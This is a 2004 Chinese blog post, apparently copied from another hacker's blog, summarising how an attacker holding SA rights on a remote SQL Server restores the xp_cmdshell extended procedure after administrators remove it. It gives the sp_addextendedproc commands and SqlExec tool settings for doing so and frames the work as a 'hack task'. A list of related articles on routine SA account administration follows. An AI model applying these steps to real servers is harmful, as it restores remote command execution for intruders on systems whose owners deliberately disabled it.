SQL Server SA权限总结(还是在冰血blog偷的)

原创 2004年11月01日 21:42:00
最近需要用到这些东西的时候,发现自己有点记不清了,这真是人老了做什么都不行了。没办法,只好在自己的blog上总结一下吧。使用Sqlexec加管理员的过程这里冰血就不涉及了。

前提需要工具:SQL Query Analyzer和SqlExec Sunx Version

第一部分:
有关去掉xp_cmdshell来保护系统的分析总结:
首先知道一下语句:
1.去掉xp_cmdshell扩展过程的方法是使用如下语句:
Code:
if exists (select * from dbo.sysobjects where id=object_id(N'[dbo].[xpcmdshell]') and OBJECTPROPERTY(id,N'IsExtendedProc')=1)
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'


2.添加xp_cmdshell扩展过程的方法是使用如下语句:
Code:
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'


现在看看现象:
我们在取得SA权限后远程用Sqlexec执行cmd命令,出现提示SQL_ERROR,那么很可能是去掉了xp_cmdshell。

现在来看看被去掉xp_cmdshell后恢复的两种方法:
方法一、使用SQL Query Analyzer连接对方后直接写入,挺方便
Code:
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'


方法二、使用SqlExec Sunx Version
首先在SqlExec Sunx Version的Format选项里填上%s,在CMD选项里输入
Code:
sp_addextendedproc 'xp_cmdshell','xpsql70.dll'

或者对Sql2000情况下使用
Code:
sp_addextendedproc 'xp_cmdshell','xplog70.dll'


另外使用SqlExec Sunx Version来去除xp_cmdshell的方法
和加的时候选择条件一样,然后输入
Code:
sp_dropextendedproc 'xp_cmdshell'

就可以了

第二部分:
假如对方已经把xplog70.dll删除或者改了名,我们来用下面的方法继续我们的hack任务:
当出现如下现象暗示代表很有可能是xplog70.dll删除或者改了名。
在查询分析器中写入
Code:
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'

提示
数据库中已存在名为'xp_cmdshell'的对象

那么我们如何恢复呢?
其实按照高手lcx提供的方法,我们可以通过使用查询分析器中写脚本来实现。
具体脚本源代码请点击连接获得。

sa用Windows启用提示权限不够怎么办?

1、用Run as a administrator打开命令提示符里输入NET STOP MSSQLSERVER, 即停止MSSQLSERVER运行。 2、在命令提示符里输入 NET START MS...
  • qq1723205668
  • qq1723205668
  • 2016年07月02日 00:23
  • 673

SQLServer初次设置sa权限步骤

1、打开sql server2005,使用windows身份验证方式进行登陆。 2、点击安全性->登录名,双击“sa”选择属性,设置密码。 3、属性页下的“状态”属性,设置“授权”和“启用”。 ...
  • hao18945923290
  • hao18945923290
  • 2017年05月23日 08:13
  • 1268

写在sqlserver 2008 数据库登录不上,sa账户无法更改,提示无权限。

楼主前几天一个项目用到了sqlserver 2008 R2,一直用的好好的,今天早上突然开机后登录不上去,用windos验证账户是可以登录进去的,然后试着修改sa账户密码,(sa账户密码忘记了),还是...
  • tudou23115
  • tudou23115
  • 2016年06月03日 14:29
  • 512

sqlserver2008sa密码忘记并且windows没有sytemadmain权限怎样修改sa密码?

http://zhidao.baidu.com/question/345269706.html(即以下文章的第三种方法)第三种方法也即是改成单用户模式 此方法用于提高windows权限 http:...
  • enthusiastic513
  • enthusiastic513
  • 2013年03月09日 11:30
  • 1026

SQL Server中sa帐号改名和删除的好方法

众所周知,在SQL中有个绝对是网络安全中的隐患的帐号sa,系统管理员 (sa),默认情况下,它指派给固定服务器角色 sysadmin,并不能进行更改。这个sa一般情况下是既不可以更改名称,也不可以删除...
  • szsbell
  • szsbell
  • 2008年04月08日 16:50
  • 620

SQL Server:轻松解决令你头疼的sa登录

相信用过SQLServer的朋友,很多人都用sa登录,但是很多时候都遇到问题,比如新装的SQLServer,等等!今天小编就和大家一起分享下如何解决这些令人头疼的问题。...
  • u012829124
  • u012829124
  • 2016年01月03日 22:08
  • 2581

SQL SERVER 2008/2012/2012R2/2014 设置开启远程连接(sa配置)

本文方案适用于Microsoft Sql Server 2008/2012/2012 r2/2014版本,以下简称MSSQLSERVER。 MSSQL默认是不允许远程连接,并且禁用sa账户的。如果想...
  • y_f123
  • y_f123
  • 2015年03月26日 11:01
  • 600

SQL Server 2008 创建SA用户和远程连接

SQL Server 2008 创建SA用户和远程连接2010年03月31日 星期三 15:10设置sa账户:1 windows身份登录数据库-》安全 -》登录名 双击sa 里面设置密码 点击左边菜单...
  • tastelife
  • tastelife
  • 2011年08月01日 09:46
  • 5335

SQL Serversa用户的启用及用户添加

1 打开Management Studio,在安全性下找到sa,右键选择属性在状态选项下,可以启用或禁用sa用户 在用户名右击新建用户 之后在数据库的安全性,用户名下新建用户,填写一个用户名,登录...
  • yinnan0422
  • yinnan0422
  • 2016年06月22日 10:26
  • 332

【SQL Server】用户的设置与授权、sa用户登录、查询一个数据库中有多少张表

一、用户的设置与授权 SQL Server用户的设置与授权除了将不同的数据库开放给不同的用户以外,还有一个就是提供一个通道给其它程序访问,毕竟直接使用Windows身份验证有点不太专业。 在实验之前,...
  • yongh701
  • yongh701
  • 2015年12月30日 17:05
  • 5996
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:SQL Server SA权限总结(还是在冰血blog偷的)
举报原因:
原因补充:

(最多只允许输入30个字)